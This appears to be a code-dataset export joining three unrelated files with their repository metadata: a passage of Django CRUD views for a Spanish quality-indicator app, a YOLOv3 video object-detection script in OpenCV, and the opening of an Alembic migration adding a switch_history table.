        form = Lenar_IndicadorForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            _actualizar_resultado(Lenar_Indicador.objects.get(id=id_))
            return redirect('Lenar_Indicador_crear')
    return render(request, 'indicadores/Lenar_Indicador_form_3.html', {'form': form})
def Lenar_IndicadorElim(request, id_):
    """Delete one recorded value and return to the list."""
    Lenar_Indicador.objects.get(id=id_).delete()
    return redirect('Lenar_Indicador_list')
# Option lists for the dependent (cascading) selects
def Lista_sub_grupo(request):
    """Options for the sub-group select, filtered by the chosen general group."""
    grupo_general = request.GET.get('grupo_general')
    subgrupos = Sub_grupo.objects.filter(grupo_general=grupo_general).order_by('nombre')
    return render(request,
                  'indicadores/listas_dependientes/Lista_sub_grupo.html',
                  {'sub_grupos': subgrupos})
def Lista_Indicador(request):
    """Options for the indicator select, filtered by the chosen sub-group."""
    sub_grupo = request.GET.get('sub_grupo')
    indicadores = Indicador.objects.filter(sub_grupo=sub_grupo)
    return render(request,
                  'indicadores/listas_dependientes/Lista_Indicador.html',
                  {'indicadors': indicadores})
# Views that render the dependent hidden fields of the entry form
def Lenar_Indicador_numerador(request):
    """Render the numerator/denominator fragment for the chosen indicator.

    NOTE(review): the POST branch saves the form and then still falls
    through to the GET-style rendering below — confirm this double duty is
    intentional.
    """
    Lenar_Indicadorl = Lenar_Indicador.objects.all()
    if request.method == 'POST' :
        form = Lenar_IndicadorForm(request.POST)
        if form.is_valid():
            form.save()
    else:
        form = Lenar_IndicadorForm()
    indicador = request.GET.get('indicador')
    indicador1 = Indicador.objects.filter(id = indicador).last()
    return render(request,'indicadores/listas_dependientes/Lenar_Indicador_numerador.html',{'indicadors':indicador1, 'form':form} )
# Async helper: swap the indicator's unit label while filling the form
def Lenar_Indicador_unidad(request):
    """Render the unit label fragment for the chosen indicator."""
    indicador = request.GET.get('indicador')
    indicador1 = Indicador.objects.filter(id = indicador).last()
    return render(request, 'indicadores/listas_dependientes/Lenar_Indicador_unidad.html',{'unidad':indicador1})
# ==== Plan_Mejoramiento (improvement plan) views ====
def Plan_MejoramientoList(request):
    """List all improvement plans."""
    Plan_Mejoramientol = Plan_Mejoramiento.objects.all()
    contexto = {'Plan_Mejoramientos':Plan_Mejoramientol}
    return render(request, 'indicadores/Plan_Mejoramiento_list.html', contexto)
def Plan_MejoramientoCrear(request, id_):
    """Create (or reuse) the improvement plan tied to one recorded value.

    NOTE(review): on POST the form is bound WITHOUT ``instance=instancia``,
    so the prepared instance is ignored and a new row may be created —
    confirm whether ``Plan_MejoramientoForm(request.POST, instance=instancia)``
    was intended.
    """
    llave_prim = Lenar_Indicador.objects.get(id =id_)
    contar_planes_mejo = Plan_Mejoramiento.objects.filter(lenar_Indicador=id_)
    if contar_planes_mejo.count() == 0:
        # No plan yet: pre-build one linked to the recorded value.
        instancia = Plan_Mejoramiento()
        instancia.lenar_Indicador = llave_prim
    else:
        instancia = contar_planes_mejo.first()
    if request.method == 'POST' :
        form = Plan_MejoramientoForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Plan_Mejoramiento_list')
    else:
        form = Plan_MejoramientoForm(instance = instancia)
    return render(request, 'indicadores/Plan_Mejoramiento_form.html', {'form':form})
def Plan_MejoramientoEdit(request, id_):
    """Edit an existing improvement plan."""
    Plan_Mejoramiento_tem = Plan_Mejoramiento.objects.get(id=id_)
    if request.method =='GET':
        form = Plan_MejoramientoForm(instance = Plan_Mejoramiento_tem)
    else:
        form = Plan_MejoramientoForm(request.POST, instance = Plan_Mejoramiento_tem)
        if form.is_valid():
            form.save()
            return redirect('Plan_Mejoramiento_list')
    return render(request,'indicadores/Plan_Mejoramiento_form.html', {'form':form})
def Plan_MejoramientoElim(request, id_):
    """Delete an improvement plan and return to the list."""
    Plan_Mejoramiento_tem = Plan_Mejoramiento.objects.get(id = id_)
    Plan_Mejoramiento_tem.delete()
    return redirect('Plan_Mejoramiento_list')
# ==== Efficacy follow-up views ====
# Estado_Avance
def Estado_AvanceList(request):
    """List all progress states."""
    estados = Estado_Avance.objects.all()
    return render(request, 'indicadores/Estado_Avance_list.html',
                  {'Estado_Avances': estados})
def Estado_AvanceCrear(request):
    """Create a progress state; blank form on GET, save on valid POST."""
    if request.method == 'POST':
        form = Estado_AvanceForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Estado_Avance_list')
    else:
        form = Estado_AvanceForm()
    return render(request, 'indicadores/Estado_Avance_form.html', {'form': form})
def Estado_AvanceEdit(request, id_):
    """Edit an existing progress state identified by ``id_``."""
    instancia = Estado_Avance.objects.get(id=id_)
    if request.method == 'GET':
        form = Estado_AvanceForm(instance=instancia)
    else:
        form = Estado_AvanceForm(request.POST, instance=instancia)
        if form.is_valid():
            form.save()
            return redirect('Estado_Avance_list')
    return render(request, 'indicadores/Estado_Avance_form.html', {'form': form})
def Estado_AvanceElim(request, id_):
    """Delete a progress state and return to the list."""
    Estado_Avance.objects.get(id=id_).delete()
    return redirect('Estado_Avance_list')
def Lista_Plan_Mejoramiento(request):
    """Render the partial for the Plan_Mejoramiento chosen in a dependent select.

    Fix: removed a leftover debug ``print`` of ``plan.titulo`` that polluted
    the server log on every AJAX request.
    """
    plan_id = request.GET.get('plan_Mejoramiento')
    plan = Plan_Mejoramiento.objects.get(id=plan_id)
    return render(request, 'indicadores/listas_dependientes/Form_Plan_Mejoramiento.html', {'plan_mejora': plan})
# Estado_Accion
# Estado_Accion CRUD
def Estado_AccionList(request):
    """Render the list of every Estado_Accion record."""
    contexto = {'Estado_Accions': Estado_Accion.objects.all()}
    return render(request, 'indicadores/Estado_Accion_list.html', contexto)

def Estado_AccionCrear(request):
    """Create an Estado_Accion from POSTed data; show a blank form on GET."""
    if request.method != 'POST':
        form = Estado_AccionForm()
    else:
        form = Estado_AccionForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Estado_Accion_list')
    return render(request, 'indicadores/Estado_Accion_form.html', {'form': form})

def Estado_AccionEdit(request, id_):
    """Edit the Estado_Accion identified by id_."""
    registro = Estado_Accion.objects.get(id=id_)
    if request.method == 'GET':
        form = Estado_AccionForm(instance=registro)
    else:
        form = Estado_AccionForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Estado_Accion_list')
    return render(request, 'indicadores/Estado_Accion_form.html', {'form': form})

def Estado_AccionElim(request, id_):
    """Delete the Estado_Accion identified by id_."""
    Estado_Accion.objects.get(id=id_).delete()
    return redirect('Estado_Accion_list')

# Oportunidad_Ejecucion CRUD
def Oportunidad_EjecucionList(request):
    """Render the list of every Oportunidad_Ejecucion record."""
    contexto = {'Oportunidad_Ejecucions': Oportunidad_Ejecucion.objects.all()}
    return render(request, 'indicadores/Oportunidad_Ejecucion_list.html', contexto)

def Oportunidad_EjecucionCrear(request):
    """Create an Oportunidad_Ejecucion from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Oportunidad_EjecucionForm()
    else:
        form = Oportunidad_EjecucionForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Oportunidad_Ejecucion_list')
    return render(request, 'indicadores/Oportunidad_Ejecucion_form.html', {'form': form})

def Oportunidad_EjecucionEdit(request, id_):
    """Edit the Oportunidad_Ejecucion identified by id_."""
    registro = Oportunidad_Ejecucion.objects.get(id=id_)
    if request.method == 'GET':
        form = Oportunidad_EjecucionForm(instance=registro)
    else:
        form = Oportunidad_EjecucionForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Oportunidad_Ejecucion_list')
    return render(request, 'indicadores/Oportunidad_Ejecucion_form.html', {'form': form})

def Oportunidad_EjecucionElim(request, id_):
    """Delete the Oportunidad_Ejecucion identified by id_."""
    Oportunidad_Ejecucion.objects.get(id=id_).delete()
    return redirect('Oportunidad_Ejecucion_list')
# Porcentaje_Avance
# Porcentaje_Avance CRUD
def Porcentaje_AvanceList(request):
    """Render the list of every Porcentaje_Avance record."""
    contexto = {'Porcentaje_Avances': Porcentaje_Avance.objects.all()}
    return render(request, 'indicadores/Porcentaje_Avance_list.html', contexto)

def Porcentaje_AvanceCrear(request):
    """Create a Porcentaje_Avance from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Porcentaje_AvanceForm()
    else:
        form = Porcentaje_AvanceForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Porcentaje_Avance_list')
    return render(request, 'indicadores/Porcentaje_Avance_form.html', {'form': form})

def Porcentaje_AvanceEdit(request, id_):
    """Edit the Porcentaje_Avance identified by id_."""
    registro = Porcentaje_Avance.objects.get(id=id_)
    if request.method == 'GET':
        form = Porcentaje_AvanceForm(instance=registro)
    else:
        form = Porcentaje_AvanceForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Porcentaje_Avance_list')
    return render(request, 'indicadores/Porcentaje_Avance_form.html', {'form': form})

def Porcentaje_AvanceElim(request, id_):
    """Delete the Porcentaje_Avance identified by id_."""
    Porcentaje_Avance.objects.get(id=id_).delete()
    return redirect('Porcentaje_Avance_list')

# Estado_Hallazgo CRUD
def Estado_HallazgoList(request):
    """Render the list of every Estado_Hallazgo record."""
    contexto = {'Estado_Hallazgos': Estado_Hallazgo.objects.all()}
    return render(request, 'indicadores/Estado_Hallazgo_list.html', contexto)

def Estado_HallazgoCrear(request):
    """Create an Estado_Hallazgo from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Estado_HallazgoForm()
    else:
        form = Estado_HallazgoForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Estado_Hallazgo_list')
    return render(request, 'indicadores/Estado_Hallazgo_form.html', {'form': form})

def Estado_HallazgoEdit(request, id_):
    """Edit the Estado_Hallazgo identified by id_."""
    registro = Estado_Hallazgo.objects.get(id=id_)
    if request.method == 'GET':
        form = Estado_HallazgoForm(instance=registro)
    else:
        form = Estado_HallazgoForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Estado_Hallazgo_list')
    return render(request, 'indicadores/Estado_Hallazgo_form.html', {'form': form})

def Estado_HallazgoElim(request, id_):
    """Delete the Estado_Hallazgo identified by id_."""
    Estado_Hallazgo.objects.get(id=id_).delete()
    return redirect('Estado_Hallazgo_list')
# Seguimiento_Eficacia
def Seguimiento_EficaciaList(request):
    """Render the list of every Seguimiento_Eficacia record."""
    contexto = {'Seguimiento_Eficacias': Seguimiento_Eficacia.objects.all()}
    return render(request, 'indicadores/Seguimiento_Eficacia_list.html', contexto)

def Seguimiento_EficaciaCrear(request):
    """Create a Seguimiento_Eficacia from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Seguimiento_EficaciaForm()
    else:
        form = Seguimiento_EficaciaForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Seguimiento_Eficacia_list')
    return render(request, 'indicadores/Seguimiento_Eficacia_form.html', {'form': form})
def Seguimiento_EficaciaCrearDos(request, id_):
    """Create (or reuse) the Seguimiento_Eficacia linked to a Plan_Mejoramiento.

    Bug fix: the original stored ``filter(...).count()`` (an int) and then
    called ``.first()`` on it, raising AttributeError whenever a
    seguimiento already existed.  The POST branch also built the form
    without ``instance=``, duplicating records on save.
    """
    llave_prim = Plan_Mejoramiento.objects.get(id=id_)
    seguimientos = Seguimiento_Eficacia.objects.filter(plan_Mejoramiento=id_)
    if seguimientos.count() == 0:
        instancia = Seguimiento_Eficacia()
        instancia.plan_Mejoramiento = llave_prim
    else:
        instancia = seguimientos.first()  # queryset, not the int count
    if request.method == 'POST':
        form = Seguimiento_EficaciaForm(request.POST, instance=instancia)
        if form.is_valid():
            form.save()
            return redirect('Seguimiento_Eficacia_list')
    else:
        form = Seguimiento_EficaciaForm(instance=instancia)
    return render(request, 'indicadores/Seguimiento_Eficacia_form.html', {'form': form})
def Seguimiento_EficaciaEdit(request, id_):
    """Edit the Seguimiento_Eficacia identified by id_."""
    registro = Seguimiento_Eficacia.objects.get(id=id_)
    if request.method == 'GET':
        form = Seguimiento_EficaciaForm(instance=registro)
    else:
        form = Seguimiento_EficaciaForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Seguimiento_Eficacia_list')
    return render(request, 'indicadores/Seguimiento_Eficacia_form.html', {'form': form})

def Seguimiento_EficaciaElim(request, id_):
    """Delete the Seguimiento_Eficacia identified by id_."""
    Seguimiento_Eficacia.objects.get(id=id_).delete()
    return redirect('Seguimiento_Eficacia_list')
# Listas para los selects dependientes
def Lista_Estado_Accion(request):
    """Partial: Estado_Accion options filtered by the selected Estado_Avance."""
    filtro = request.GET.get('estado_Avance')
    opciones = Estado_Accion.objects.filter(estado_Avance=filtro)
    return render(request, 'indicadores/listas_dependientes/Lista_Estado_Accion.html', {'estado_Accions': opciones})

def Lista_Estado_Hallazgo(request):
    """Partial: Estado_Hallazgo options filtered by the selected Estado_Avance."""
    filtro = request.GET.get('estado_Avance')
    opciones = Estado_Hallazgo.objects.filter(estado_Avance=filtro)
    return render(request, 'indicadores/listas_dependientes/Lista_Estado_Hallazgo.html', {'estado_Hallazgos': opciones})

def Lista_Porcentaje_Avance(request):
    """Partial: Porcentaje_Avance options filtered by the selected Estado_Avance."""
    filtro = request.GET.get('estado_Avance')
    opciones = Porcentaje_Avance.objects.filter(estado_Avance=filtro)
    return render(request, 'indicadores/listas_dependientes/Lista_Porcentaje_Avance.html', {'porcentaje_Avances': opciones})
# Parametro_Segui_Eficacia
# Parametro_Segui_Eficacia CRUD
def Parametro_Segui_EficaciaList(request):
    """Render the list of every Parametro_Segui_Eficacia record."""
    contexto = {'Parametro_Segui_Eficacias': Parametro_Segui_Eficacia.objects.all()}
    return render(request, 'indicadores/Parametro_Segui_Eficacia_list.html', contexto)

def Parametro_Segui_EficaciaCrear(request):
    """Create a Parametro_Segui_Eficacia from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Parametro_Segui_EficaciaForm()
    else:
        form = Parametro_Segui_EficaciaForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Parametro_Segui_Eficacia_list')
    return render(request, 'indicadores/Parametro_Segui_Eficacia_form.html', {'form': form})

def Parametro_Segui_EficaciaEdit(request, id_):
    """Edit the Parametro_Segui_Eficacia identified by id_."""
    registro = Parametro_Segui_Eficacia.objects.get(id=id_)
    if request.method == 'GET':
        form = Parametro_Segui_EficaciaForm(instance=registro)
    else:
        form = Parametro_Segui_EficaciaForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Parametro_Segui_Eficacia_list')
    return render(request, 'indicadores/Parametro_Segui_Eficacia_form.html', {'form': form})

def Parametro_Segui_EficaciaElim(request, id_):
    """Delete the Parametro_Segui_Eficacia identified by id_."""
    Parametro_Segui_Eficacia.objects.get(id=id_).delete()
    return redirect('Parametro_Segui_Eficacia_list')

# Unidad_Medida CRUD
def Unidad_MedidaList(request):
    """Render the list of every Unidad_Medida record."""
    contexto = {'Unidad_Medidas': Unidad_Medida.objects.all()}
    return render(request, 'indicadores/Unidad_Medida_list.html', contexto)

def Unidad_MedidaCrear(request):
    """Create a Unidad_Medida from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Unidad_MedidaForm()
    else:
        form = Unidad_MedidaForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Unidad_Medida_list')
    return render(request, 'indicadores/Unidad_Medida_form.html', {'form': form})

def Unidad_MedidaEdit(request, id_):
    """Edit the Unidad_Medida identified by id_."""
    registro = Unidad_Medida.objects.get(id=id_)
    if request.method == 'GET':
        form = Unidad_MedidaForm(instance=registro)
    else:
        form = Unidad_MedidaForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Unidad_Medida_list')
    return render(request, 'indicadores/Unidad_Medida_form.html', {'form': form})

def Unidad_MedidaElim(request, id_):
    """Delete the Unidad_Medida identified by id_."""
    Unidad_Medida.objects.get(id=id_).delete()
    return redirect('Unidad_Medida_list')
# Cargo
# Cargo CRUD
def CargoList(request):
    """Render the list of every Cargo record."""
    contexto = {'Cargos': Cargo.objects.all()}
    return render(request, 'indicadores/Cargo_list.html', contexto)

def CargoCrear(request):
    """Create a Cargo from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = CargoForm()
    else:
        form = CargoForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Cargo_list')
    return render(request, 'indicadores/Cargo_form.html', {'form': form})

def CargoEdit(request, id_):
    """Edit the Cargo identified by id_."""
    registro = Cargo.objects.get(id=id_)
    if request.method == 'GET':
        form = CargoForm(instance=registro)
    else:
        form = CargoForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Cargo_list')
    return render(request, 'indicadores/Cargo_form.html', {'form': form})

def CargoElim(request, id_):
    """Delete the Cargo identified by id_."""
    Cargo.objects.get(id=id_).delete()
    return redirect('Cargo_list')

# Norma CRUD
def NormaList(request):
    """Render the list of every Norma record."""
    contexto = {'Normas': Norma.objects.all()}
    return render(request, 'indicadores/Norma_list.html', contexto)

def NormaCrear(request):
    """Create a Norma from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = NormaForm()
    else:
        form = NormaForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Norma_list')
    return render(request, 'indicadores/Norma_form.html', {'form': form})

def NormaEdit(request, id_):
    """Edit the Norma identified by id_."""
    registro = Norma.objects.get(id=id_)
    if request.method == 'GET':
        form = NormaForm(instance=registro)
    else:
        form = NormaForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Norma_list')
    return render(request, 'indicadores/Norma_form.html', {'form': form})

def NormaElim(request, id_):
    """Delete the Norma identified by id_."""
    Norma.objects.get(id=id_).delete()
    return redirect('Norma_list')
# Nivel_Referencia
# Nivel_Referencia CRUD
def Nivel_ReferenciaList(request):
    """Render the list of every Nivel_Referencia record."""
    contexto = {'Nivel_Referencias': Nivel_Referencia.objects.all()}
    return render(request, 'indicadores/Nivel_Referencia_list.html', contexto)

def Nivel_ReferenciaCrear(request):
    """Create a Nivel_Referencia from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Nivel_ReferenciaForm()
    else:
        form = Nivel_ReferenciaForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Nivel_Referencia_list')
    return render(request, 'indicadores/Nivel_Referencia_form.html', {'form': form})

def Nivel_ReferenciaEdit(request, id_):
    """Edit the Nivel_Referencia identified by id_."""
    registro = Nivel_Referencia.objects.get(id=id_)
    if request.method == 'GET':
        form = Nivel_ReferenciaForm(instance=registro)
    else:
        form = Nivel_ReferenciaForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Nivel_Referencia_list')
    return render(request, 'indicadores/Nivel_Referencia_form.html', {'form': form})

def Nivel_ReferenciaElim(request, id_):
    """Delete the Nivel_Referencia identified by id_."""
    Nivel_Referencia.objects.get(id=id_).delete()
    return redirect('Nivel_Referencia_list')

# Proceso CRUD
def ProcesoList(request):
    """Render the list of every Proceso record."""
    contexto = {'Procesos': Proceso.objects.all()}
    return render(request, 'indicadores/Proceso_list.html', contexto)

def ProcesoCrear(request):
    """Create a Proceso from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = ProcesoForm()
    else:
        form = ProcesoForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Proceso_list')
    return render(request, 'indicadores/Proceso_form.html', {'form': form})

def ProcesoEdit(request, id_):
    """Edit the Proceso identified by id_."""
    registro = Proceso.objects.get(id=id_)
    if request.method == 'GET':
        form = ProcesoForm(instance=registro)
    else:
        form = ProcesoForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Proceso_list')
    return render(request, 'indicadores/Proceso_form.html', {'form': form})

def ProcesoElim(request, id_):
    """Delete the Proceso identified by id_."""
    Proceso.objects.get(id=id_).delete()
    return redirect('Proceso_list')
# Tipo_Proc
def Tipo_ProcList(request):
    """Render the list of every Tipo_Proc record."""
    contexto = {'Tipo_Procs': Tipo_Proc.objects.all()}
    return render(request, 'indicadores/Tipo_Proc_list.html', contexto)

def Tipo_ProcCrear(request):
    """Create a Tipo_Proc from POSTed data; blank form on GET."""
    if request.method != 'POST':
        form = Tipo_ProcForm()
    else:
        form = Tipo_ProcForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Tipo_Proc_list')
    return render(request, 'indicadores/Tipo_Proc_form.html', {'form': form})

def Tipo_ProcEdit(request, id_):
    """Edit the Tipo_Proc identified by id_."""
    registro = Tipo_Proc.objects.get(id=id_)
    if request.method == 'GET':
        form = Tipo_ProcForm(instance=registro)
    else:
        form = Tipo_ProcForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            return redirect('Tipo_Proc_list')
    return render(request, 'indicadores/Tipo_Proc_form.html', {'form': form})

def Tipo_ProcElim(request, id_):
    """Delete the Tipo_Proc identified by id_."""
    Tipo_Proc.objects.get(id=id_).delete()
    return redirect('Tipo_Proc_list')
| WETECH-INNOVATIONS/wetech | Calidad/Apps/indicador/views.py | views.py | py | 35,474 | python | es | code | 0 | github-code | 1 | [
{
"api_name": "django.views.generic.CreateView",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "django.urls.reverse_lazy",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 40,
"usage_type": "call"
},
... |
74496272353 | # ==================================
# Video Object Detection with YOLOv3
# ==================================
# RUN WITH EXAMPLE COMMAND BELOW:
# python YOLO_vid.py -i vid_IO/drive.mp4 -o vid_IO/drive_processed.mp4 -y yolov3
import numpy as np
import argparse
import imutils
import time
import cv2
import os
"""User inputs through command line"""
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input", required=True, help="path to input video")
ap.add_argument("-o", "--output", required=True, help="path to output video")
ap.add_argument("-y", "--yolo", required=True, help="base path to YOLO directory")
ap.add_argument("-c", "--confidence", type=float, default=0.5, help="minimum probability to filter weak detections")
ap.add_argument("-t", "--threshold", type=float, default=0.3, help="threshold when applying non-maxima suppression")
args = vars(ap.parse_args())
def get_model():
    """Load YOLOv3 (cfg + weights) and the COCO labels from the --yolo dir.

    Returns (labels, model, out_layer_names).

    Fix: ``getUnconnectedOutLayers()`` returns ``[[i], ...]`` in old OpenCV
    but a flat ``[i, ...]`` array in OpenCV >= 4.5.4; indexing ``i[0]``
    crashed on the newer versions.  Flattening handles both shapes.
    """
    model = cv2.dnn.readNetFromDarknet(os.path.sep.join([args["yolo"], "yolov3.cfg"]),
                                       os.path.sep.join([args["yolo"], "yolov3.weights"]))
    # COCO class labels: one name per line in coco.names.
    labels = open(os.path.sep.join([args["yolo"], "coco.names"])).read().strip().split("\n")
    # Output layer names; layer ids are 1-based, hence the -1.
    layer_names = model.getLayerNames()
    out_ids = np.asarray(model.getUnconnectedOutLayers()).flatten()
    out_layer_names = [layer_names[int(i) - 1] for i in out_ids]
    return labels, model, out_layer_names
def get_color(labels):
    """Return one deterministic uint8 RGB color per class label (fixed seed)."""
    np.random.seed(1)
    return np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
def init_video():
    """Open the --input video; writer and frame dimensions start uninitialized."""
    stream = cv2.VideoCapture(args["input"])
    # (stream, writer, frame_width, frame_height)
    return stream, None, None, None
def get_frame_number(video_stream):
    """Best-effort total frame count; returns -1 when it cannot be determined.

    Fix: narrowed the bare ``except:`` (which also swallowed
    KeyboardInterrupt/SystemExit) to ``except Exception``.
    """
    try:
        prop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() else cv2.CAP_PROP_FRAME_COUNT
        num_frame = int(video_stream.get(prop))
        print("{} total frames in video".format(num_frame))
    except Exception:
        print("Cannot determine the approximate processing time needed.")
        num_frame = -1
    return num_frame
# -----------------------------------------------------------
# Below functions are all called in the video stream pipeline
# -----------------------------------------------------------
def preprocess_input(model, frame):
    """Normalize the frame into a 416x416 blob and feed it to the network."""
    blob = cv2.dnn.blobFromImage(frame, 1.0 / 255, (416, 416), swapRB=True, crop=False)
    model.setInput(blob)
def get_input(video_stream, frame_width, frame_height):
    """Read one frame, filling in dimensions on first use.

    Returns (frame, height, width, grabbed); grabbed is False at end of video.
    """
    grabbed, frame = video_stream.read()
    if not grabbed:
        return None, None, None, grabbed
    if frame_width is None or frame_height is None:
        frame_height, frame_width = frame.shape[:2]
    return frame, frame_height, frame_width, grabbed
def forward_pass(writer, model, out_layer_names, num_frame):
    """Run one YOLO forward pass and return the raw layer outputs.

    On the very first frame (writer not yet created) it also prints a
    per-frame timing and an estimated total processing time.

    Fix: ``writer == None`` replaced with the idiomatic identity test
    ``writer is None``.
    """
    tick = time.time()
    layer_outputs = model.forward(out_layer_names)
    tock = time.time()
    # The writer exists after the first written frame, so this prints once.
    if writer is None and num_frame > 0:
        print("YOLOv3 took {:.3f} seconds for one frame".format(tock - tick))
        print("YOLOv3 takes estimated total time of {:.3f} seconds for the video".format((tock - tick) * num_frame))
    return layer_outputs
def filter_output(layer_outputs, frame_width, frame_height):
    """Convert raw YOLO outputs into box/confidence/class lists plus the
    indices surviving non-maxima suppression.

    Each detection row is [cx, cy, w, h, objectness, class scores...], with
    coordinates normalized to [0, 1]; thresholds come from the module-level
    ``args`` dict (--confidence, --threshold).
    """
    boxes = []
    confidences = []
    classIDs = []
    # process output
    for output in layer_outputs:
        for detection in output:
            scores = detection[5:] # detection starts with locational variables (0 to 1)
            classID = np.argmax(scores)
            confidence = scores[classID]
            if confidence > args["confidence"]: # filter out low confidence
                # Scale normalized center/size back to pixel coordinates.
                box_data = detection[:4] * np.array([frame_width, frame_height, frame_width, frame_height])
                (center_X, center_Y, box_width, box_height) = box_data.astype("int")
                # Convert center coordinates to the top-left corner OpenCV expects.
                x = int(center_X - (box_width / 2))
                y = int(center_Y - (box_height / 2))
                # record box data, confidence, and class ID for the detected (note boxes is 2d)
                boxes.append([x, y, int(box_width), int(box_height)])
                confidences.append(float(confidence))
                classIDs.append(classID)
    # with box dimension, we can now call non-maxima suppression (filtering out overlapping)
    indices = cv2.dnn.NMSBoxes(boxes, confidences, args["confidence"], args["threshold"])
    return boxes, confidences, classIDs, indices
def draw_box(frame, boxes, confidences, classIDs, indices, labels, colors):
    """Overlay the post-NMS bounding boxes and class captions on the frame."""
    if len(indices) > 0:
        for i in indices.flatten():
            x, y, w, h = boxes[i]
            color = [int(c) for c in colors[classIDs[i]]]
            cv2.rectangle(frame, (x, y), (x + w, y + h), color, 1)
            caption = "{}: {:.4f}".format(labels[classIDs[i]], confidences[i])
            cv2.putText(frame, caption, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 1)
    return frame
def write_to_video(writer, frame):
    """Append a frame to the output video, lazily creating the writer first."""
    if writer is None:
        codec = cv2.VideoWriter_fourcc(*"mp4v")  # or change to *"MJPG"
        writer = cv2.VideoWriter(args["output"], codec, 30, (frame.shape[1], frame.shape[0]), True)
    writer.write(frame)
    return writer
def loop_frames(labels, colors, model, out_layer_names, video_stream, writer, frame_width, frame_height, num_frame):
    """Process every frame of the input stream through the YOLO pipeline.

    Per frame: read -> blob/setInput -> forward -> threshold+NMS -> draw
    boxes -> append to the output video.  Returns (writer, video_stream)
    for clean_up once the stream is exhausted.
    """
    while True:
        frame, frame_height, frame_width, grabbed = get_input(video_stream, frame_width, frame_height)
        if not grabbed:
            # return both parameters for clean_up, breaks out of loop
            print("Finished!")
            return writer, video_stream
        preprocess_input(model, frame)
        yolo_output = forward_pass(writer, model, out_layer_names, num_frame)
        boxes, confidences, classIDs, indices = filter_output(yolo_output, frame_width, frame_height)
        output_frame = draw_box(frame, boxes, confidences, classIDs, indices, labels, colors)
        # write_to_video also creates the writer on the first frame.
        writer = write_to_video(writer, output_frame)
def show_output():
    """Play back the processed output video; press q to stop early.

    Fix: replaced the non-idiomatic ``== False`` / ``== True`` comparisons
    with direct truthiness tests and flattened the nested loop body.
    """
    output_stream = cv2.VideoCapture(args["output"])
    if not output_stream.isOpened():
        print("Error opening video file, try opening it from the output path")
    while output_stream.isOpened():
        grabbed, frame = output_stream.read()
        if not grabbed:
            break
        cv2.imshow('Frame', frame)
        # press Q to exit
        if cv2.waitKey(25) & 0xFF == ord('q'):
            break
    # clean up output
    output_stream.release()
    cv2.destroyAllWindows()
def clean_up(writer, video_stream):
    """Release the output writer and the input capture stream."""
    for resource in (writer, video_stream):
        resource.release()
def run():
    """Wire the whole pipeline: model load -> frame loop -> cleanup -> playback."""
    labels, model, out_layers = get_model()
    colors = get_color(labels)
    stream, writer, frame_w, frame_h = init_video()
    total_frames = get_frame_number(stream)
    writer, stream = loop_frames(labels, colors, model, out_layers, stream, writer, frame_w, frame_h, total_frames)
    clean_up(writer, stream)
    show_output()
run()
| Jacklu0831/Real-Time-Object-Detection | 1_YOLO/YOLO_vid.py | YOLO_vid.py | py | 7,575 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "cv2.dnn.readNetFromDarknet",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "cv2.dnn",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "os.pa... |
72263563554 | """Added switch history
Revision ID: b85b82664c28
Revises: 94ccd671cbcd
Create Date: 2021-03-26 15:56:26.634107
"""
from alembic import op
import sqlalchemy as sa
from its_on.utils import AwareDateTime
# revision identifiers, used by Alembic.
revision = 'b85b82664c28'
down_revision = '94ccd671cbcd'
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``switch_history`` audit table.

    Each row records which user changed which switch to what value and when
    (``changed_at`` is timezone-aware via the project's AwareDateTime type).
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('switch_history',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('switch_id', sa.Integer(), nullable=True),
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('new_value', sa.String(length=64), nullable=False),
